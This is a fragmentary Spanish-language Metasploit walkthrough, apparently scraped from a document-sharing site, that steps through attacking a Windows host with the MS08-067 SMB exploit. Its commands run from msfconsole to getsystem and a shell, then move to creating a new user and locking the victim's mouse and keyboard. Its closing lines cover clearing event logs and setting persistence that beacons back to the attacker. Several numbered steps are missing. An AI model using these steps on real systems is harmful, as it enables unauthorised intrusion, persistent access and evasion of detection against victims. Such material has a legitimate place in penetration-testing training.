Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Sintaxis: msfconsole
3- Cargar el exploit. En este caso utilizamos uno que ataca al protocolo smb.
use exploit/windows/smb/ms08_067_netapi
5- Se coloca la IP local.
6- Se coloca la IP remota.
8- Lanzar el exploit.
Sintaxis: exploit
Sintaxis: getsystem
10- Una vez tenemos privilegios hay que crear un nuevo usuario.
Sintaxis: shell
meterpreter > Kill = Sirve para “matar” procesos (podemos usar el comando previo PS para ver
todos los procesos que están corriendo)
Si por algún motivo queremos impedir que el usuario del sistema comprometido utilice el
mouse y/o el teclado, existe uictl que permite estas funcionalidades:
Ya que hemos borrado los eventos antes de “abandonar” la victima entonces también
podemos usar el comando persistance que permite a meterpreter anclarse al inicio del
sistema e intente establecer conexiones con la máquina atacante cada X tiempo: